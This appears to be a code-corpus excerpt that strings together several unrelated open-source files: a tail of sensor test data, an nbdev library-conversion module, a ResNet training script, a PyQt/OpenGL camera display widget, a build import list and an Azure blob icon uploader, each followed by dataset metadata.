b'T#01 62.54,\r\nT#03 87.65,90.73,90.48,24.64,14.42\r\n \r\n \x0e7\x124\r\xfe',
b'T#01 62.07,\r\nT#03 87.48,90.98,90.17,25.01,14.42\r\n \r\n \x80\xfea\x92\xc4\xae',
b'T#01 63.46,\r\nT#03 87.52,91.04,90.37,24.83,14.40\r\n \r\n \x80\xc0',
b'T#01 60.82,\r\nT#03 87.18,90.87,90.26,24.67,14.39\r\n \r\n \x03?h\x04\xb1\x98\t\x80\x0f\x81\x01\x80',
b'T#01 54.87,\r\nT#03 87.27,90.85,90.50,24.82,14.41\r\n \r\n \xfc(\x04B\x1c\xf0',
b'T#01 73.36,\r\nT#03 87.56,90\xfc\x04\x01\x12\x12\xf5\x1e0\x01\x80',
b'T#01 71.44,\r\nT#03 87.76,91.00,90.31,24.82,14.14\r\n \r\n \xc0t',
b'T#01 64.59,\r\nT#03 87.24,91.05,90.08,24.17,14.42\r\n \r\n \x02\xe0',
b'T#01 72.30,\r\nT#03 87.32,91.08,90.14,23.47,14.42\r\n \r\n @H\x80\x01\xa0\x19\x15\x03',
b'T#01 65.38,\r\nT#03 87.48,90.94,90.24,23.25,14.44\r\n \r\n \x03\x10\x06\x85l0\x18',
b'T#01 64.02,\r\nT#03 87.45,90.98,90.18,22.97,14.42\r\n \r\n \x80\xfe\x1b',
b'\x01\xf9T#01 87.72,\r\nT#03 87.60,91.12,90.06,22.60,14.27\r\n \r\n \x80\xf8\x8c\x10\x8b',
b'T#01 80.09,\r\nT#03 87.47,91.07,89.97,22.08,14.09\r\nT#01 86.17,\r\nT#03 87.47,91.09,90.05,21.94,14.04\r\n \r\n \xfcM\x06D\x06',
b'T#01 67.42,\r\nT#03 87.45,91.03,90.00,21.38,14.42\r\n \r\n \xfd9P\x0c\\\x04',
b'T#01 72.79,\r\nT#03 87.40,91.07,90.09,20.90,14.13\r\n \r\n \xc1\x03',
b'T#01 72.22,\r\nT#03 87.66,91.27,90.00,20.44,13.91\r\n \r\n \x10\x10\x80\x0c\xd0t\xc4\x17\x0c\x80',
b'T#01 71.30,\r\nT#03 87.56,91.18,90.11,20.04,13.76\r\n \r\n \x01\xea',
b'T#01 83.55,\r\nT#03 87.52,90.96,89.86,19.28,13.64\r\n \r\n \xf4',
b'T#01 77.06,\r\nT#03 87.75,91.30,90.21,18.97,13.49\r\n \r\n \xa0\x8a&\x02',
b'T#01 79.01,\r\nT#03 87.55,91.02,90.12,18.57,13.39\r\n \r\n \x0c\x03\x03\xc0\xe1\x80 \xfc',
b'T#01 91.21,\r\nT#03 87.67,91.03,90.01,18.39,13.28\r\n \r\n \xe6\x19\xd0\x01\xd0',
b'T#01 89.87,\r\nT#03 88.16,91.20,90.12,18.07,13.16\r\n \r\n \xe0\xc4\x90\xc2\x03\xf0',
b'T#01 89.64,\r\nT#03 87.91,90.82,89.80,17.45,13.08\r\n \r\n \x02\x02\x13\xc0c\xc8\x19\xfc',
b'T#01 88.11,\r\nT#03 87.94,90.98,89.85,17.33,13.01\r\n \r\n \x80\r\x18\xfe',
b'T#01 89.66,\r\nT#03 87.88,91.42,89.75,17.03,12.96\r\n \r\n \xc0x\x80\x08\xbd\x0f',
b'T#01 92.55,\r\nT#03 87.94,90.80,89.64,16.70,12.93\r\n \r\n \xfev\xa9\x04',
b'T#01 88.17,\r\nT#03 87.94,91.15,89.74,16.60,12.93\r\n \r\n \x050\x89\xc1\x81\xe7V\x06&',
b'T#01 92.07,\r\nT#03 87.76,90.92,89.62,16.64,12.93\r\n \r\n \xfc\x01<\xe0\x08\x04',
b'T#01 89.57,\r\nT#03 87.67,90.97,89.57,16.57,12.93\r\n \r\n \x01"\x80\x04\xfe',
b'T#01 88.74,\r\nT#03 88.18,91.11,90.09,16.61,12.93\r\n \r\n \x03\x060\xfe\x8f\x97\x0e\x170\x01\xc0',
b'T#01 88.81,\r\nT#03 87.98,90.89,89.86,16.19,12.95\r\n \r\n \xf0\x85\x0e8\xe8\x03',
b'T#01 95.93,\r\nT#03 87.88,90.96,90.01,16.06,12.96\r\n \r\n \xfa',
b'\xf8T#01 92.55,\r\nT#03 87.87,90.92,90.17,15.88,12.96\r\n \r\n \xc9\x08,',
b'T#01 93.25,\r\nT#03 87.74,90.88,89.86,15.81,12.96\r\n \r\n \xfe%m\x03\x91\x0f',
b'\x0c\xc0T#01 94.89,\r\nT#03 87.81,91.07,89.78,15.67,12.96\r\n \r\n \x01\xfa0\x08',
b'T#01 92.07,\r\nT#03 87.87,90.94,89.96,15.63,12.96\r\n \r\n \xfe\x0b\xe0\xc3',
b'T#01 97.30,\r\nT#03 87.75,91.06,90.04,15.38,12.96\r\n \r\n \x02@',
b'T#01 95.69,\r\nT#03 87.68,91.04,89.88,15.24,12.96\r\n \r\n \x900\xe4',
b'T#01 95.21,\r\nT#03 87.78,90.99,89.73,15.18,12.96\r\n \r\n C\xfe\x1cD\n\x89\x81',
b'T#01 91.75,\r\nT#03 87.90,90.96,89.65,15.18,12.96\r\n \r\n @\xf2,A',
]
clean_data = [
[['61.01', ], ],
[['56.92', ], ],
[['63.51', ], ],
[['56.05', ], ],
[['59.20', ], ],
[['52.21', ], ],
[['49.17', ], ],
[['45.93', ], ],
[['50.86', ], ],
[['47.12', ], ],
[['50.26', ], ],
[['57.21', ], ],
[['54.55', ], ],
[['53.39', ], ],
[['52.59', ], ],
[['54.47', ], ],
[['55.85', ], ],
[['52.55', ], ],
[['54.72', ], ],
[['54.70', ], ],
[['55.10', ], ],
[['53.83', ], ],
[['54.64', ], ],
[['53.13', ], ],
[['60.26', ], ],
[['56.29', ], ],
[['66.20', ], ],
[['57.08', ], ],
[['61.81', ], ],
[['59.01', ], ],
[['56.05', ], ],
[['63.64', ], ['64.58', ], ],
[['67.45', ], ],
[['60.04', ], ],
[['59.57', ], ],
[['61.67', ], ],
[['85.78', ], ],
[['69.74', ], ],
[['65.01', ], ],
[['63.63', ], ],
[['61.84', ], ],
[['65.72', ], ],
[['61.01', ], ],
[['60.10', ], ],
[['61.83', ], ],
[['65.53', ], ],
[['67.88', ], ],
[['77.61', ], ],
[['67.28', ], ],
[['63.90', ], ],
[['60.11', ], ],
[['66.12', ], ],
[['71.97', ], ],
[['66.58', ], ],
[['58.96', ], ],
[['58.30', ], ],
[['56.55', ], ],
[['58.05', ], ],
[['76.65', ], ],
[['65.58', ], ],
[['62.54', ], ],
[['62.07', ], ],
[['63.46', ], ],
[['60.82', ], ],
[['54.87', ], ],
[['73.36', ], ],
[['71.44', ], ],
[['64.59', ], ],
[['72.30', ], ],
[['65.38', ], ],
[['64.02', ], ],
[['87.72', ], ],
[['80.09', ], ['86.17', ], ],
[['67.42', ], ],
[['72.79', ], ],
[['72.22', ], ],
[['71.30', ], ],
[['83.55', ], ],
[['77.06', ], ],
[['79.01', ], ],
[['91.21', ], ],
[['89.87', ], ],
[['89.64', ], ],
[['88.11', ], ],
[['89.66', ], ],
[['92.55', ], ],
[['88.17', ], ],
[['92.07', ], ],
[['89.57', ], ],
[['88.74', ], ],
[['88.81', ], ],
[['95.93', ], ],
[['92.55', ], ],
[['93.25', ], ],
[['94.89', ], ],
[['92.07', ], ],
[['97.30', ], ],
[['95.69', ], ],
[['95.21', ], ],
[['91.75', ], ],
]
| 2.046875 | 2 |
lib2nbdev/convert.py | manisnesan/lib2nbdev | 27 | 12772946 | # AUTOGENERATED! DO NOT EDIT! File to edit: 00_convert.ipynb (unless otherwise specified).
__all__ = ['code_cell', 'write_module_cell', 'init_nb', 'write_cell', 'write_nb', 'convert_lib']
# Cell
import json
from fastcore.basics import Path
from fastcore.xtras import is_listy
from fastcore.foundation import Config
from fastcore.script import call_parse
from fastprogress.fastprogress import progress_bar
from nbdev.export import nbglob, export_names, _re_class_func_def, _re_obj_def
from nbdev.sync import _split
from .generators import generate_settings, generate_ci, generate_doc_foundations, generate_setup
# Cell
def code_cell(code:str=None) -> str:
    """
    Returns an empty Jupyter code cell, optionally pre-filled with `code`
    (a single string, or a list of lines joined with trailing newlines).
    """
    cell = {
        "cell_type": "code",
        "execution_count": None,
        "metadata": {},
        "outputs": [],
        "source": []
    }
    if is_listy(code):
        last = len(code) - 1
        for idx, line in enumerate(code):
            # every line except the last carries its newline explicitly
            cell["source"].append(line + '\n' if idx < last else line)
    elif code:
        cell["source"].append(code)
    return cell
# Cell
def write_module_cell() -> str:
    """
    Returns a placeholder Markdown cell holding the notebook's title and
    description, for the user to edit afterwards.
    """
    source = [
        "# Default Title (change me)\n",
        "> Default description (change me)"
    ]
    return {
        "cell_type": "markdown",
        "metadata": {},
        "source": source
    }
# Cell
def init_nb(module_name:str) -> str:
    """
    Initializes a blank notebook dict for `module_name`, seeding the
    `# default_exp` cell and a placeholder title/description markdown cell.
    Strips a leading package dot and any `.ipynb` suffix from the name.
    """
    name = module_name
    if name[0] == '.': name = name.split('.')[1]
    if '.ipynb' in name: name = name.split('.ipynb')[0]
    metadata = {
        "jupytext": {"split_at_heading": True},
        "kernelspec": {"display_name": "Python 3", "language": "python", "name": "python3"}
    }
    return {
        "cells": [code_cell(f"# default_exp {name}"), write_module_cell()],
        "metadata": metadata,
        "nbformat": 4,
        "nbformat_minor": 4
    }
# Cell
def write_cell(code:str, is_public:bool=False) -> str:
    """
    Takes source `code`, adds an initial export tag, and returns a Jupyter cell.

    `is_public=True`  -> "#export"  (exported, shown in docs)
    `is_public=False` -> "#exporti" (exported, internal)
    `is_public=None`  -> empty marker line

    BUG FIX: the original's `if is_public is None: export = ''` branch was
    dead code — the next line unconditionally overwrote `export`, so None
    behaved like False. The conditional is now an if/else as intended.
    """
    if is_public is None:
        export = ''
    else:
        export = '#export' if is_public else '#exporti'
    source = [f"{export}"] + code.split("\n")
    return code_cell(source)
# Cell
def write_nb(cfg_path:str, cfg_name:str, splits:list, num:int, parent:str=None, private_list:list=None) -> None:
    """
    Write a fully converted Jupyter Notebook based on `splits` and save it in
    `Config`'s `nbs_path`.

    The notebook filename is prefixed with `num` (zero-padded to two digits).
    `parent` denotes that the current notebook module lives under a parent
    module such as `moduleA.moduleB`.
    `private_list` is a by-cell list of `True`/`False` stating whether each
    block of code is public or private.
    """
    # Fix: `private_list` used a shared mutable default ([]); `None` sentinel
    # behaves identically for callers. (Return annotation also corrected:
    # nothing is returned.)
    if private_list is None: private_list = []
    # Get filename
    fname = splits[0][0]
    if fname[0] == '.': fname = fname[1:]
    if parent is not None: fname = f'{parent}.{fname}'
    # Initialize and write notebook
    nb = init_nb(fname)
    for i, (_, code) in enumerate(splits):
        c = write_cell(code, private_list[i])
        nb["cells"].append(c)
    # Figure out the notebook number (zero-pad single digits)
    if num < 10:
        fname = f'0{num}_{fname}'
    else:
        fname = f'{num}_{fname}'
    # Save notebook in `nbs_path`
    with open(f'{Config(cfg_path, cfg_name).path("nbs_path")/fname}', 'w+') as source_nb:
        source_nb.write(json.dumps(nb))
# Internal Cell
def _not_private(n):
"Checks if a func is private or not, alternative to nbdev's"
for t in n.split('.'):
if (t.startswith('_') and not t.startswith('__')): return False
return '\\' not in t and '^' not in t and t != 'else'
# Cell
@call_parse
def convert_lib():
    """
    Converts existing library to an nbdev one by autogenerating notebooks.

    Optional prerequisites:
      - Make a nbdev settings.ini file beforehand
      - Optionally you can add `# Cell` and `# Internal Cell` tags in the source files where you would like specific cells to be

    Run this command in the base of your repo.
    **Can only be run once**
    """
    print('Checking for a settings.ini...')
    cfg_path, cfg_name = '.', 'settings.ini'
    generate_settings()
    print('Gathering files...')
    # All .py modules under the configured library path
    files = nbglob(extension='.py', config_key='lib_path', recursive=True)
    if len(files) == 0: raise ValueError("No files were found, please ensure that `lib_path` is configured properly in `settings.ini`")
    print(f'{len(files)} modules found in the library')
    num_nbs = len(files)
    nb_path = Config(cfg_path, cfg_name).path('nbs_path')
    nb_path.mkdir(exist_ok=True)
    print(f'Writing notebooks to {nb_path}...')
    # When the notebook folder *is* the library folder, generated .py headers
    # reference notebooks without a path prefix
    if nb_path.name == Config(cfg_path, cfg_name).lib_name:
        nb_path = Path('')
        slash = ''
    else:
        nb_path = Path(nb_path.name)
        slash = '/'
    for num, file in enumerate(progress_bar(files)):
        # NOTE(review): `slash` is always '' or '/' here, so `slash is not None`
        # is always True — confirm whether a different sentinel was intended
        if (file.parent.name != Config(cfg_path, cfg_name).lib_name) and slash is not None:
            parent = file.parent.name
        else:
            parent = None
        fname = file.name.split('.py')[0] + '.ipynb'
        if fname[0] == '.': fname = fname[1:]
        # Initial string in the .py (note: it contains a "# Cell" marker)
        init_str = f"# AUTOGENERATED! DO NOT EDIT! File to edit: {nb_path}{slash}{fname} (unless otherwise specified).\n\n# Cell\n"
        # Override existing code to include nbdev magic and one code cell
        with open(file, encoding='utf8') as f: code = f.read()
        if "AUTOGENERATED" not in code:
            code = init_str + code
            # Check to ensure we haven't tried exporting once yet
            # NOTE(review): `"# Cell" and "# Internal Cell" not in code` does NOT
            # test membership of "# Cell" — a non-empty string literal is always
            # truthy, so this reduces to
            # `"# Internal Cell" not in code and '__all__' not in code`.
            # A literal membership fix would also always be False because
            # `init_str` (prepended just above) already contains "# Cell".
            # Confirm the intended semantics before changing.
            if "# Cell" and "# Internal Cell" not in code and '__all__' not in code:
                split_code = code.split('\n')
                # Leading True accounts for the init_str header cell
                private_list = [True]
                _do_pass, _private, _public = False, '# Internal Cell\n', '# Cell\n'
                for row, line in enumerate(split_code):
                    # Skip the line right after a tagged decorator
                    if _do_pass: _do_pass = False; continue
                    # Deal with decorators
                    # NOTE(review): matches ANY line containing '@' (e.g. an
                    # e-mail address in a comment), not just decorator lines
                    if '@' in line:
                        code = split_code[row+1]
                        if code[:4] == 'def ': code = code[4:]
                        if 'patch' in line or 'typedispatch' in line or not line[0].isspace():
                            is_private = _not_private(code.split('(')[0])
                            private_list.append(is_private)
                            split_code[row] = f'{_public}{line}' if is_private else f'{_private}{line}'
                            _do_pass = True
                    # Deal with objects
                    elif _re_obj_def.match(line) and not _do_pass:
                        is_private = _not_private(line.split('(')[0])
                        private_list.append(is_private)
                        split_code[row] = f'{_public}{line}' if is_private else f'{_private}{line}'
                    # Deal with classes or functions
                    elif _re_class_func_def.match(line) and not _do_pass:
                        is_private = _not_private(line.split(' ')[1].split('(')[0])
                        private_list.append(is_private)
                        split_code[row] = f'{_public}{line}' if is_private else f'{_private}{line}'
                code = '\n'.join(split_code)
                # Write to file
                with open(file, 'w', encoding='utf8') as f: f.write(code)
            # Build notebooks
            splits = _split(code)
            # NOTE(review): `private_list` is only bound inside the branch above;
            # when that branch is skipped (manual "# Internal Cell" tags or an
            # existing `__all__`), this call raises NameError on the first file
            # or silently reuses the previous file's list — verify.
            write_nb(cfg_path, cfg_name, splits, num, parent, private_list)
            # Generate the `__all__` in the top of each .py
            if '__all__' not in code:
                c = code.split("(unless otherwise specified).")
                code = c[0] + "(unless otherwise specified).\n" + f'\n__all__ = {export_names(code)}\n\n# Cell' + c[1]
                with open(file, 'w', encoding='utf8') as f: f.write(code)
        else:
            print(f"{file.name} was already converted.")
    generate_doc_foundations()
    print(f"{Config(cfg_path, cfg_name).lib_name} successfully converted!")
    # Interactive follow-ups: pip packaging and CI workflow generation
    _setup = int(input("Would you like to setup this project to be pip installable and configure a setup.py? (0/1)"))
    if _setup:
        generate_setup()
        print('Project is configured for pypi, please see `setup.py` for any advanced configurations')
    _workflow = int(input("Would you like to setup the automated Github workflow that nbdev provides? (0/1)"))
    if _workflow:
        generate_ci()
        print("Github actions generated! Please make sure to include .github/actions/main.yml in your next commit!")
print("Github actions generated! Please make sure to include .github/actions/main.yml in your next commit!") | 2.078125 | 2 |
train.py | SumitM0432/Explicit-Content-Classifier-using-ResNet | 3 | 12772947 | import torch
import config
import engine
import dataset_prep
import torch.nn as nn
import model
import metrics
import matplotlib.pyplot as plt
if __name__ == '__main__':
    # Build the training/validation DataLoaders (split handled in dataset_prep)
    train_loader, val_loader = dataset_prep.tr_dataset(batch_size = config.BATCH_SIZE)
    # Class-name -> index mapping; the double `.dataset` hop suggests the
    # loader wraps a Subset of a torchvision-style dataset — confirm in dataset_prep
    classes = val_loader.dataset.dataset.class_to_idx
    print (classes)
    # Model: ResNet-101 backbone (the ResNet-50 variant is kept for reference)
    # model_load = model.resnet_model_50()
    model_load = model.resnet_model_101()
    model_load.to(config.DEVICE)
    print ('Model Loaded ---------- \n')
    # Loss and optimizer (the LR scheduler is kept for reference but unused)
    criterion = nn.CrossEntropyLoss()
    optimizer = torch.optim.Adam(model_load.parameters(), lr = config.LEARNING_RATE)
    # scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer)
    print ('Training Started ---------- \n')
    # Train and collect the loss histories returned by the engine
    trained_model, train_losses, val_losses = engine.training_func(model_load, train_loader, val_loader, config.EPOCHS, config.DEVICE, optimizer, criterion)
    # Persist the trained weights (file name encodes architecture/epochs/LR)
    torch.save(trained_model.state_dict(), config.OUT + 'resnet101_e5_0.0001.pth')
    print ('Model Saved ---------- \n')
    # Plot the training and validation loss curves
    plt.plot(train_losses, label='Training loss')
    plt.plot(val_losses, label='Validation loss')
    plt.legend(frameon=False)
    plt.show()
| 2.4375 | 2 |
pydc1394/ui/qt/display.py | joristork/milovision | 8 | 12772948 | #!/usr/bin/env python
# encoding: utf-8
#
# This file is part of pydc1394.
#
# pydc1394 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# pydc1394 is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with pydc1394. If not, see
# <http://www.gnu.org/licenses/>.
#
# Copyright (C) 2009, 2010 by <NAME> <<EMAIL>>
# and the pydc1394 contributors (see README File)
"""
This module contains a live display widget and a live display window
that can be used to interactively display a camera image.

This package requires PyQt4.
"""
from __future__ import division
import time
from OpenGL.GL import *
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtOpenGL import *
import numpy as np
try:
from Utils import saveload as Sl
except ImportError:
pass
__all__ = [ "LiveCameraWin", "ImageDisplay", ]
class AcquisitionThread(QThread):
    """
    Background thread that pulls frames from a camera and re-emits them
    as the old-style Qt signal "newImage".

    The thread starts itself on construction and runs until `stop()` is
    called or the camera stops running.
    """
    def __init__(self, cam, parent = None):
        super(AcquisitionThread, self).__init__(parent)
        self._stopped = False
        # Protects `_stopped`, which is written from the GUI thread (stop)
        # and read from this worker thread (isStopped)
        self._mutex = QMutex()
        self._cam = cam
        # Begin acquiring immediately
        self.start()
    def stop(self):
        """Request the acquisition loop to terminate (thread-safe)."""
        try:
            self._mutex.lock()
            self._stopped = True
        finally:
            self._mutex.unlock()
    def isStopped(self):
        """Return whether a stop has been requested (thread-safe)."""
        s = False
        try:
            self._mutex.lock()
            s = self._stopped
        finally:
            self._mutex.unlock()
        return s
    def run(self):
        """Acquisition loop executed in the worker thread."""
        if not self._cam.running:
            self._cam.start(interactive=True)
        while not self.isStopped():
            # `new_image` is presumably a lock/condition signalling frame
            # arrival — TODO confirm against pydc1394's camera API
            self._cam.new_image.acquire()
            if not self._cam.running:
                self.stop()
            else:
                # Receivers are handed the most recent frame
                self.emit(SIGNAL("newImage"), self._cam.current_image)
            self._cam.new_image.release()
class LiveCameraWin(QWidget):
    """
    Top-level window showing a live video stream from `cam`.

    Owns an `ImageDisplay` for rendering and an `AcquisitionThread`
    that feeds it new frames via the "newImage" signal.
    """
    def __init__(self, cam, zoom = 1.0, parent = None):
        super(LiveCameraWin, self).__init__(parent)
        # Display widget sized to the camera mode's frame shape/dtype
        self.camWidget = ImageDisplay(cam.mode.shape, cam.mode.dtype, zoom)
        mainLayout = QHBoxLayout()
        mainLayout.addWidget(self.camWidget)
        self.setLayout(mainLayout)
        self.setWindowTitle(
            "Camera %s, GUID %s, %s, %.1f fps" % (
                cam.model, cam.guid, str(cam.mode), cam.fps)
        )
        # Start pulling frames and route them into the display widget
        self.acquisitionThread = AcquisitionThread(cam)
        self.connect(self.acquisitionThread,
            SIGNAL("newImage"), self.camWidget.newImage)
    def sizeHint(self):
        # Preferred size: the display's minimum size plus the layout margins
        msh = self.camWidget.minimumSizeHint()
        return QSize( msh.width() + self.layout().margin()*2,
                msh.height() + self.layout().margin()*2)
    def closeEvent(self, evt):
        # Stop the acquisition thread when the window is closed
        self.acquisitionThread.stop()
class ImageDisplay(QGLWidget):
def __init__(self, shape, dtype, zoom = 1.0, parent=None):
"""
This function implements a Panel which can display Live Video stream
to the user. It also implements saving the current image to a file
by keyboard stroke.
The Display is implemented using OpenGL, it defines a GLGanvas with
the same coordinate frame as the shown image (0,0 is therefore the
top left border).
shape - numpy shape tuple of data to display
dtype - numpy data type of image data to display
zoom - how much should the image be resized
parent - parent of this panel
"""
f = QGLFormat()
# The next line decides if the image flickers or not.
# Unfortunately, if the image doesn't flicker, we do not get
# a high enough frame rate to display our camera images if we try
# to display them all. We now use a QTimer to redraw our window
# every 1/60 of a second, and this seems to work well.
f.setSwapInterval(1)
super(ImageDisplay, self).__init__(f, parent)
self._arr = np.empty(shape, dtype=dtype)
self._gldrawmode = GL_LUMINANCE if len(shape) == 2 else GL_RGB
self._zoom = zoom
if dtype[-1] in ['1','8']:
self._glinternal = GL_UNSIGNED_BYTE
elif dtype[-2:] == '16' or dtype[-1] == '2':
self._glinternal = GL_UNSIGNED_SHORT
else:
raise RuntimeError, "Unknown datatype!"
sizePolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)
sizePolicy.setHeightForWidth(True)
self.setSizePolicy(sizePolicy)
self.setFocusPolicy(Qt.WheelFocus)
# We redraw our image 60 times per second; no matter what kind of camera
# is attached
self.aTimer = QTimer()
self.connect(self.aTimer, SIGNAL("timeout()"), self.updateGL)
self.aTimer.start(1000/60)
# Initialisations for FPS calculation
self._ltime = time.time()
self._drawn_frames = 0
self._totframes = 0
def minimumSizeHint(self):
return QSize(self._arr.shape[1]*self._zoom,
self._arr.shape[0]*self._zoom)
def heightForWidth(self, w):
return w/self._arr.shape[1] * self._arr.shape[0]
def newImage(self, i):
self._arr = i
# self.updateGL()
def keyPressEvent(self, evt):
key = evt.key()
if key == Qt.Key_F:
print "FPS: %.2f" % self._fps
elif key == Qt.Key_Space:
Sl.save_image_with_number(
self._arr, "image", "jpg",".")
elif key in map(ord, '123456789'):
self._zoom = int(chr(key))
self.resize(self.minimumSizeHint())
self.parent().adjustSize()
elif key in map(ord,'!"$%&/()') + [ 167 ]:
if evt.modifiers() & Qt.SHIFT:
val = {
ord('!'): 1,
ord('"'): 2,
167: 3,
ord('$'): 4,
ord('%'): 5,
ord('&'): 6,
ord('/'): 7,
ord('('): 8,
ord(')'): 9,
}[key]
self._zoom = 1/val
self.resize(self.minimumSizeHint())
self.parent().adjustSize()
else:
return QGLWidget.keyPressEvent(self, evt)
def initializeGL( self ):
"""
This function initalizes OpenGL according to what we need
in this context
"""
glEnable(GL_TEXTURE_2D); # Enable Texture Mapping
glTexParameteri(GL_TEXTURE_2D,GL_TEXTURE_MAG_FILTER,GL_NEAREST); # Set Texture Max Filter
glTexParameteri(GL_TEXTURE_2D,GL_TEXTURE_MIN_FILTER,GL_NEAREST); # Set Texture Min Filter
# Determine the texture size (which must be 2**x)
texdim_w, texdim_h = 32,32
while texdim_w < self._arr.shape[1]:
texdim_w *= 2
while texdim_h < self._arr.shape[0]:
texdim_h *= 2
self._texture_coords = (float(self._arr.shape[1])/texdim_w,float(self._arr.shape[0])/texdim_h)
# Generate our Texture
# The next line makes sure that bytes are read in the correct
# order while unpacking from python
glPixelStoref(GL_UNPACK_SWAP_BYTES, 1)
glTexImage2D(GL_TEXTURE_2D, 0, self._gldrawmode, texdim_w, texdim_h, 0, self._gldrawmode, self._glinternal, None)
# Set our viewport
w,h = self.width(), self.height()
glViewport(0, 0, w, h)
glClear( GL_COLOR_BUFFER_BIT );
# Set our Projection to Orthographic and the coordinate system
# like the picture
glMatrixMode( GL_PROJECTION );
glLoadIdentity();
glOrtho(0.0, self._arr.shape[1], self._arr.shape[0], 0.0, -1.0, 1.0);
glMatrixMode( GL_MODELVIEW );
glLoadIdentity();
# self._quadric = gluNewQuadric()
def resizeGL(self, width, height):
# Reset our Viewpoint.
glViewport(0, 0, width, height)
def paintGL(self):
# Remake the Texture from the new image data
glTexSubImage2D (GL_TEXTURE_2D, 0, 0, 0,
self._arr.shape[1], self._arr.shape[0],
self._gldrawmode, self._glinternal, self._arr);
glColor3f( 1.,1.,1. )
# Draw the imageplane
x,y = self._texture_coords
glBegin(GL_QUADS)
glTexCoord2f(0.0, 0.); glVertex3f(0., 0., - .5)
glTexCoord2f(x, 0.); glVertex3f(self._arr.shape[1], 0., - .5)
glTexCoord2f(x, y); glVertex3f(self._arr.shape[1],
self._arr.shape[0], - .5)
glTexCoord2f(0., y); glVertex3f(0., self._arr.shape[0], - .5)
glEnd()
# Calculate the FPS
ctime = time.time()
dtime = ctime-self._ltime
if dtime > 1:
fps= self._drawn_frames/dtime
self._ltime = ctime
self._drawn_frames = 0
self._fps = fps
self._drawn_frames += 1
self._totframes += 1
| 1.773438 | 2 |
scripts/build.py | 1byte2bytes/SydChain | 0 | 12772949 | <reponame>1byte2bytes/SydChain
import build_autoconf
import build_automake
import build_bison
import build_libtool
import build_m4
import build_make
import build_cmake
import build_git
import build_mercurial
import build_ccache
import build_gawk
import build_yasm
import build_nasm
import build_mono
import build_rustc
import build_ninja
import build_dmd
#import build_swift
import build_llvm
# i686 toolchain
#import build_i686_binutils
#import build_i686_gcc
| 0.863281 | 1 |
tools/paconn-cli/paconn/apimanager/iconuploader.py | Mounika-Chillamcherla/PowerPlatformConnectors | 0 | 12772950 | # -----------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# -----------------------------------------------------------------------------
"""
Uploads an icon for the custom connector
"""
import os
import mimetypes
from urllib.parse import urlparse, urlunparse
from azure.storage.blob import ContentSettings, BlockBlobService
def upload_icon(sas_url, file_path):
    """
    Upload a custom connector icon to blob storage via a SAS URL.

    `sas_url` is a container-level SAS URL; the icon at `file_path` is
    uploaded into that container and a SAS download URL for the new blob
    is returned.
    """
    # Split the SAS URL into its components
    scheme, netloc, path, params, query, fragment = urlparse(sas_url)
    # The storage account name is the host label before the first dot
    account_name = netloc[:netloc.index('.')]
    # The container name is the URL path without surrounding slashes
    container_name = path.strip('/')
    # The SAS token (the query string) authenticates the blob service
    blob_service = BlockBlobService(
        account_name=account_name,
        sas_token=query)
    # Blob name and content headers are derived from the local file name
    blob_name = os.path.basename(file_path)
    content_type, content_encoding = mimetypes.guess_type(blob_name)
    settings = ContentSettings(
        content_type=content_type,
        content_encoding=content_encoding)
    # Upload the icon into the container
    blob_service.create_blob_from_path(
        container_name=container_name,
        blob_name=blob_name,
        file_path=file_path,
        content_settings=settings)
    # Rebuild the URL with the blob name appended to get a download link
    return urlunparse((scheme, netloc, path + '/' + blob_name, params, query, fragment))
| 2.5 | 2 |